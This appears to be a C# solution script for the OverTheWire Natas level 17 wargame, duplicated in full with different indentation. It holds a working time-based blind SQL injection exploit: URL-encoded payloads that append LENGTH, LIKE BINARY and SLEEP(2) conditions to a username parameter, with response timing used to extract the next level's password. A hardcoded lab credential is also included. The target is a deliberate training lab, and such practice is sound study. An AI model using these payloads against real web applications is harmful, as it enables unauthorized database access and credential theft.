HFahlstedt/otw_natas17.cs

## otw_natas17.cs
var client = new HttpClient();
var baseUrl = "http://natas17.natas.labs.overthewire.org";

var userPass = "natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw";

var token = Convert.ToBase64String(Encoding.UTF8.GetBytes(userPass));

client.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue("Basic", token);
var passwordLength = 0;

for (int i = 1; i <= 64; i++)
{
	var sw = new Stopwatch();
	sw.Start();

	var response = await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+LENGTH(password)+%3D+{i}+AND+SLEEP(2)+%23");

	sw.Stop();

	if (sw.ElapsedMilliseconds > 1500)
	{
		passwordLength = i;
		break;
	}
}

var characterSet = Enumerable.Range('0', '9' - '0' + 1)
	.Union(Enumerable.Range('A', 'Z' - 'A' + 1))
	.Union(Enumerable.Range('a', 'z' - 'a' + 1))
	.Select(Convert.ToChar).ToList();

var includedChars = new List<char>();

foreach (var c in characterSet)
{
	var sw = new Stopwatch();
	sw.Start();

	var response = await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+password+LIKE+BINARY+%22%25{c}%25%22+AND+SLEEP(2)+%23");

	if (sw.ElapsedMilliseconds > 1500)
	{
		includedChars.Add(c);
	}

	sw.Stop();
}

var password = new StringBuilder();

for (int i = 0; i < passwordLength; i++)
{
	var found = false;
	var gi = 0;
	while (!found)
	{
		var guess = includedChars[gi++];

		var sw = new Stopwatch();
		sw.Start();

		var response = await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+password+LIKE+BINARY+%22{password}{guess}%25%22+AND+SLEEP(2)+%23");

		sw.Stop();

		if (sw.ElapsedMilliseconds > 1500)
		{
			password.Append(guess);
			found = true;
		}
	}
}

Console.WriteLine(password);
	var client = new HttpClient();
	var baseUrl = "http://natas17.natas.labs.overthewire.org";

	var userPass = "natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw";

	var token = Convert.ToBase64String(Encoding.UTF8.GetBytes(userPass));

	client.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue("Basic", token);
	var passwordLength = 0;

	for (int i = 1; i <= 64; i++)
	{
	var sw = new Stopwatch();
	sw.Start();

	var response = await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+LENGTH(password)+%3D+{i}+AND+SLEEP(2)+%23");

	sw.Stop();

	if (sw.ElapsedMilliseconds > 1500)
	{
	passwordLength = i;
	break;
	}
	}

	var characterSet = Enumerable.Range('0', '9' - '0' + 1)
	.Union(Enumerable.Range('A', 'Z' - 'A' + 1))
	.Union(Enumerable.Range('a', 'z' - 'a' + 1))
	.Select(Convert.ToChar).ToList();

	var includedChars = new List<char>();

	foreach (var c in characterSet)
	{
	var sw = new Stopwatch();
	sw.Start();

	var response = await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+password+LIKE+BINARY+%22%25{c}%25%22+AND+SLEEP(2)+%23");

	if (sw.ElapsedMilliseconds > 1500)
	{
	includedChars.Add(c);
	}

	sw.Stop();
	}

	var password = new StringBuilder();

	for (int i = 0; i < passwordLength; i++)
	{
	var found = false;
	var gi = 0;
	while (!found)
	{
	var guess = includedChars[gi++];

	var sw = new Stopwatch();
	sw.Start();

	var response = await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+password+LIKE+BINARY+%22{password}{guess}%25%22+AND+SLEEP(2)+%23");

	sw.Stop();

	if (sw.ElapsedMilliseconds > 1500)
	{
	password.Append(guess);
	found = true;
	}
	}
	}

	Console.WriteLine(password);